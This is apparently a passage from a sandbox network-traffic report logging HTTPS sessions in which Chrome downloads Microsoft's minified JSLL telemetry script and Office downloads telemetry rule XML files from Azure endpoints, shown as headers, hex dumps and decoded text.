                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  121192.168.2.74986513.107.246.634437964C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:13 UTC370OUTGET /scripts/c/ms.jsll-4.min.js HTTP/1.1
                                                                                                                                                                                  Host: js.monitor.azure.com
                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                  2024-11-23 18:53:14 UTC889INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:14 GMT
                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                  Content-Length: 207935
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: no-transform, public, max-age=1800, immutable
                                                                                                                                                                                  Last-Modified: Mon, 14 Oct 2024 17:27:31 GMT
                                                                                                                                                                                  ETag: 0x8DCEC757C1AD1D1
                                                                                                                                                                                  x-ms-request-id: 24663fe8-301e-00d3-0bb2-2cfca8000000
                                                                                                                                                                                  x-ms-version: 2009-09-19
                                                                                                                                                                                  x-ms-meta-jssdkver: 4.3.3
                                                                                                                                                                                  x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-4.3.3.min.js
                                                                                                                                                                                  Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                  x-azure-ref: 20241123T185314Z-174c587ffdfn4nhwhC1TEB2nbc000000039000000000t472
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:14 UTC15495INData Raw: 2f 2a 21 0a 20 2a 20 31 44 53 20 4a 53 4c 4c 20 53 4b 55 2c 20 34 2e 33 2e 33 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 28 4d 69 63 72 6f 73 6f 66 74 20 49 6e 74 65 72 6e 61 6c 20 4f 6e 6c 79 29 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 21 3d 6e 29 74 28 65 78 70 6f 72 74 73 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69
                                                                                                                                                                                  Data Ascii: /*! * 1DS JSLL SKU, 4.3.3 * Copyright (c) Microsoft and contributors. All rights reserved. * (Microsoft Internal Only) */!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&defi
                                                                                                                                                                                  2024-11-23 18:53:14 UTC16384INData Raw: 28 69 29 3a 28 72 3d 66 65 28 22 63 6f 6e 73 6f 6c 65 22 29 29 26 26 28 72 2e 65 72 72 6f 72 7c 7c 72 2e 6c 6f 67 29 28 74 2c 63 65 28 69 29 29 29 29 7d 53 65 28 61 3d 7b 74 68 65 6e 3a 6f 2c 22 63 61 74 63 68 22 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6f 28 75 6e 64 65 66 69 6e 65 64 2c 65 29 7d 2c 22 66 69 6e 61 6c 6c 79 22 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2c 6e 3d 74 3b 72 65 74 75 72 6e 20 51 28 74 29 26 26 28 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 26 26 74 28 29 2c 65 7d 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 74 26 26 74 28 29 2c 65 7d 29 2c 6f 28 65 2c 6e 29 7d 7d 2c 22 73 74 61 74 65 22 2c 7b 67 65 74 3a 64 7d 29 2c 68 74 28 29 26 26 28 61 5b 6d 74 28
                                                                                                                                                                                  Data Ascii: (i):(r=fe("console"))&&(r.error||r.log)(t,ce(i))))}Se(a={then:o,"catch":function(e){return o(undefined,e)},"finally":function(t){var e=t,n=t;return Q(t)&&(e=function(e){return t&&t(),e},n=function(e){throw t&&t(),e}),o(e,n)}},"state",{get:d}),ht()&&(a[mt(
                                                                                                                                                                                  2024-11-23 18:53:14 UTC16384INData Raw: 28 65 2c 74 2c 6e 2c 72 29 7b 67 65 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 26 26 65 5b 74 5d 26 26 28 6e 3f 28 6e 2e 63 62 5b 74 65 5d 28 7b 66 6e 3a 72 2c 61 72 67 3a 65 7d 29 2c 6e 2e 68 3d 6e 2e 68 7c 7c 6e 6e 28 70 63 2c 30 2c 6e 29 29 3a 4d 28 72 2c 5b 65 5d 29 29 7d 29 7d 68 63 2e 5f 5f 69 65 44 79 6e 3d 31 3b 76 61 72 20 76 63 3d 68 63 3b 66 75 6e 63 74 69 6f 6e 20 68 63 28 65 29 7b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 3d 5b 5d 3b 76 61 72 20 6e 2c 69 3d 5b 5d 2c 61 3d 7b 68 3a 6e 75 6c 6c 2c 63 62 3a 5b 5d 7d 2c 6f 3d 76 6f 28 65 2c 64 63 29 5b 4b 6e 5d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 3d 21 21 65 2e 63 66 67 2e 70 65 72 66 45 76 74 73 53 65 6e 64 41 6c 6c 7d 29 3b 76 65 28 68 63 2c 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                  Data Ascii: (e,t,n,r){ge(e,function(e){e&&e[t]&&(n?(n.cb[te]({fn:r,arg:e}),n.h=n.h||nn(pc,0,n)):M(r,[e]))})}hc.__ieDyn=1;var vc=hc;function hc(e){this.listeners=[];var n,i=[],a={h:null,cb:[]},o=vo(e,dc)[Kn](function(e){n=!!e.cfg.perfEvtsSendAll});ve(hc,this,function(
                                                                                                                                                                                  2024-11-23 18:53:14 UTC16384INData Raw: 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 61 2e 66 6c 75 73 68 43 6f 6d 70 6c 65 74 65 3d 65 2c 50 3d 21 30 2c 52 2e 72 75 6e 28 6f 2c 61 29 2c 66 5b 67 72 5d 28 29 2c 6f 5b 6c 72 5d 28 61 29 7d 2c 36 2c 6e 29 2c 69 7d 2c 66 5b 6f 72 5d 3d 73 2c 66 2e 61 64 64 50 6c 75 67 69 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 6f 75 29 3b 76 61 72 20 69 3d 73 28 65 5b 24 6e 5d 29 3b 69 66 28 69 26 26 21 74 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 22 50 6c 75 67 69 6e 20 5b 22 2b 65 5b 24 6e 5d 2b 22 5d 20 69 73 20 61 6c 72 65 61 64 79 20 6c 6f 61 64 65 64 21 22 29 3b 76 61 72 20 61 2c 6f 3d 7b 72 65 61 73 6f 6e 3a 31 36 7d 3b 66
                                                                                                                                                                                  Data Ascii: (e,function(e){a.flushComplete=e,P=!0,R.run(o,a),f[gr](),o[lr](a)},6,n),i},f[or]=s,f.addPlugin=function(e,t,n,r){if(!e)return r&&r(!1),void C(ou);var i=s(e[$n]);if(i&&!t)return r&&r(!1),void C("Plugin ["+e[$n]+"] is already loaded!");var a,o={reason:16};f
                                                                                                                                                                                  2024-11-23 18:53:14 UTC16384INData Raw: 6c 3a 31 2c 43 72 69 74 69 63 61 6c 3a 32 7d 29 2c 75 6e 64 65 66 69 6e 65 64 2c 75 6e 64 65 66 69 6e 65 64 29 2c 53 6c 3d 22 22 3b 66 75 6e 63 74 69 6f 6e 20 78 6c 28 65 29 7b 74 72 79 7b 69 66 28 6f 65 28 6f 74 28 29 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 74 3d 28 6e 65 77 20 44 61 74 65 29 5b 4f 73 5d 28 29 2c 6e 3d 66 65 28 65 3d 3d 3d 45 6c 2e 4c 6f 63 61 6c 53 74 6f 72 61 67 65 3f 22 6c 6f 63 61 6c 53 74 6f 72 61 67 65 22 3a 22 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 22 29 2c 72 3d 53 6c 2b 74 2c 69 3d 28 6e 2e 73 65 74 49 74 65 6d 28 72 2c 74 29 2c 6e 2e 67 65 74 49 74 65 6d 28 72 29 21 3d 3d 74 29 3b 69 66 28 6e 5b 52 73 5d 28 72 29 2c 21 69 29 72 65 74 75 72 6e 20 6e 7d 63 61 74 63 68 28 61 29 7b 7d 72 65 74 75 72 6e 20 6e 75 6c
                                                                                                                                                                                  Data Ascii: l:1,Critical:2}),undefined,undefined),Sl="";function xl(e){try{if(oe(ot()))return null;var t=(new Date)[Os](),n=fe(e===El.LocalStorage?"localStorage":"sessionStorage"),r=Sl+t,i=(n.setItem(r,t),n.getItem(r)!==t);if(n[Rs](r),!i)return n}catch(a){}return nul
                                                                                                                                                                                  2024-11-23 18:53:14 UTC16384INData Raw: 6f 20 74 72 61 63 6b 20 70 61 67 65 20 76 69 73 69 74 20 74 69 6d 65 20 66 61 69 6c 65 64 2c 20 6d 65 74 72 69 63 20 77 69 6c 6c 20 6e 6f 74 20 62 65 20 63 6f 6c 6c 65 63 74 65 64 3a 20 22 2b 63 65 28 72 29 29 7d 7d 2c 59 28 65 2c 22 5f 6c 6f 67 67 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 2c 59 28 65 2c 22 70 61 67 65 56 69 73 69 74 54 69 6d 65 54 72 61 63 6b 69 6e 67 48 61 6e 64 6c 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 7d 29 7d 76 61 72 20 4e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 68 69 73 5b 67 64 5d 3d 50 74 28 29 2c 74 68 69 73 2e 70 61 67 65 4e 61 6d 65 3d 65 2c 74 68 69 73 2e 70 61 67 65 55 72 6c 3d 74 7d 2c 44 64 3d 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                  Data Ascii: o track page visit time failed, metric will not be collected: "+ce(r))}},Y(e,"_logger",{g:function(){return o}}),Y(e,"pageVisitTimeTrackingHandler",{g:function(){return c}})})}var Nd=function(e,t){this[gd]=Pt(),this.pageName=e,this.pageUrl=t},Dd=function(
                                                                                                                                                                                  2024-11-23 18:53:14 UTC16384INData Raw: 63 6f 72 65 44 61 74 61 2c 22 62 65 68 61 76 69 6f 72 22 29 2c 75 65 28 6e 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 6e 2e 70 61 67 65 54 79 70 65 29 2c 75 65 28 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 26 26 21 75 65 28 65 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 2c 75 65 28 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 26 26 28 65 2e 6d 61 72 6b 65 74 3d 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 2c 65 2e 69 73 4c 6f 67 67 65 64 49 6e 3d 47 64 28 72 2e 5f 63 6f 6e 66 69 67 29 2c 74 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 3d 6f 63 28 29 7d 2c 69 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 73 65 74 50 61 67 65 54
                                                                                                                                                                                  Data Ascii: coreData,"behavior"),ue(n.pageType)&&(e.pageType=n.pageType),ue(r._pageTypeMetaTag)&&!ue(e.pageType)&&(e.pageType=r._pageTypeMetaTag),ue(r._marketMetaTag)&&(e.market=r._marketMetaTag),e.isLoggedIn=Gd(r._config),t.cookieEnabled=oc()},ip.prototype._setPageT
                                                                                                                                                                                  2024-11-23 18:53:14 UTC16384INData Raw: 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 57 69 74 68 44 61 74 61 42 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 7e 74 5b 6e 5d 2e 6e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 64 61 74 61 2d 62 69 2d 22 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 22 64 61 74 61 2d 6d 22 3d 3d 3d 74 5b 6e 5d 2e 6e 61 6d
                                                                                                                                                                                  Data Ascii: n!0;return!1},Ap.prototype._isTrackedWithDataBi=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if(~t[n].name.indexOf("data-bi-"))return!0;return!1},Ap.prototype._isTracked=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if("data-m"===t[n].nam
                                                                                                                                                                                  2024-11-23 18:53:14 UTC16384INData Raw: 75 74 68 54 6f 6b 65 6e 22 2c 61 3d 22 41 75 74 68 58 54 6f 6b 65 6e 22 2c 67 67 3d 22 6d 73 66 70 63 22 2c 76 67 3d 22 75 73 65 72 22 2c 68 67 3d 22 61 6c 6c 6f 77 52 65 71 75 65 73 74 53 65 6e 64 69 6e 67 22 2c 6d 67 3d 22 66 69 72 73 74 52 65 71 75 65 73 74 53 65 6e 74 22 2c 79 67 3d 22 73 68 6f 75 6c 64 41 64 64 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 73 22 2c 43 67 3d 22 67 65 74 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 56 61 6c 75 65 22 2c 62 67 3d 22 73 65 74 43 6c 6f 63 6b 53 6b 65 77 22 2c 79 65 3d 22 6c 65 6e 67 74 68 22 2c 54 67 3d 22 63 6f 6e 63 61 74 22 2c 49 67 3d 22 69 4b 65 79 22 2c 45 67 3d 22 63 6f 75 6e 74 22 2c 5f 67 3d 22 65 76 65 6e 74 73 22 2c 53 67 3d 22 70 75 73 68 22 2c 78 67 3d 22 73 70 6c 69 74 22 2c 4e 67 3d 22 73 70
                                                                                                                                                                                  Data Ascii: uthToken",a="AuthXToken",gg="msfpc",vg="user",hg="allowRequestSending",mg="firstRequestSent",yg="shouldAddClockSkewHeaders",Cg="getClockSkewHeaderValue",bg="setClockSkew",ye="length",Tg="concat",Ig="iKey",Eg="count",_g="events",Sg="push",xg="split",Ng="sp
                                                                                                                                                                                  2024-11-23 18:53:15 UTC16384INData Raw: 29 29 2c 65 5b 6c 76 5d 26 26 28 65 5b 6c 76 5d 3d 65 61 28 65 5b 6c 76 5d 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 65 5b 79 76 5d 7c 7c 28 65 5b 79 76 5d 3d 30 29 2c 65 5b 43 76 5d 7c 7c 28 65 5b 43 76 5d 3d 31 29 2c 6c 28 65 29 2c 65 5b 62 76 5d 29 69 66 28 55 7c 7c 61 65 29 65 5b 43 76 5d 3d 33 2c 65 5b 62 76 5d 3d 21 31 3b 65 6c 73 65 20 69 66 28 48 29 72 65 74 75 72 6e 20 57 26 26 28 65 3d 65 61 28 65 29 29 2c 48 5b 72 76 5d 28 45 76 2e 63 72 65 61 74 65 28 65 5b 49 67 5d 2c 5b 65 5d 29 2c 21 30 3d 3d 3d 65 5b 62 76 5d 3f 31 3a 65 5b 62 76 5d 2c 33 29 3b 76 61 72 20 6e 3d 65 5b 43 76 5d 2c 72 3d 63 65 2c 69 3d 52 2c 61 3d 28 34 3d 3d 3d 6e 26 26 28 72 3d 6f 65 2c 69 3d 4f 29 2c 21 31 29 3b 72 3c 69 3f 61 3d 21 43 28 65 2c
                                                                                                                                                                                  Data Ascii: )),e[lv]&&(e[lv]=ea(e[lv])))}function a(e,t){if(e[yv]||(e[yv]=0),e[Cv]||(e[Cv]=1),l(e),e[bv])if(U||ae)e[Cv]=3,e[bv]=!1;else if(H)return W&&(e=ea(e)),H[rv](Ev.create(e[Ig],[e]),!0===e[bv]?1:e[bv],3);var n=e[Cv],r=ce,i=R,a=(4===n&&(r=oe,i=O),!1);r<i?a=!C(e,


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  122192.168.2.74987813.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:15 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:16 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:16 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1401
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE2A9D541"
                                                                                                                                                                                  x-ms-request-id: 3385e8da-101e-00a2-400c-3d9f2e000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185316Z-178bfbc474bwh9gmhC1NYCy3rs00000004wg00000000epn8
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:16 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  123192.168.2.74988413.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:16 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:16 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:16 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1391
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                  ETag: "0x8DC582BDF58DC7E"
                                                                                                                                                                                  x-ms-request-id: c1e9356c-301e-0099-2920-3d6683000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185316Z-178bfbc474bmqmgjhC1NYCy16c00000004z000000000767f
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:16 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  124192.168.2.74988713.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:16 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:16 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:16 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1403
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                                  ETag: "0x8DC582BDCDD6400"
                                                                                                                                                                                  x-ms-request-id: e8f84e55-c01e-0079-2269-3be51a000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185316Z-178bfbc474bfw4gbhC1NYCunf400000004s000000000p3fb
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:16 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  125192.168.2.74988613.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:16 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:16 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:16 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1354
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE0662D7C"
                                                                                                                                                                                  x-ms-request-id: c06a529d-f01e-0085-0e9a-3b88ea000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185316Z-15b8b599d88hr8sfhC1TEBbca400000003ag000000000xt2
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
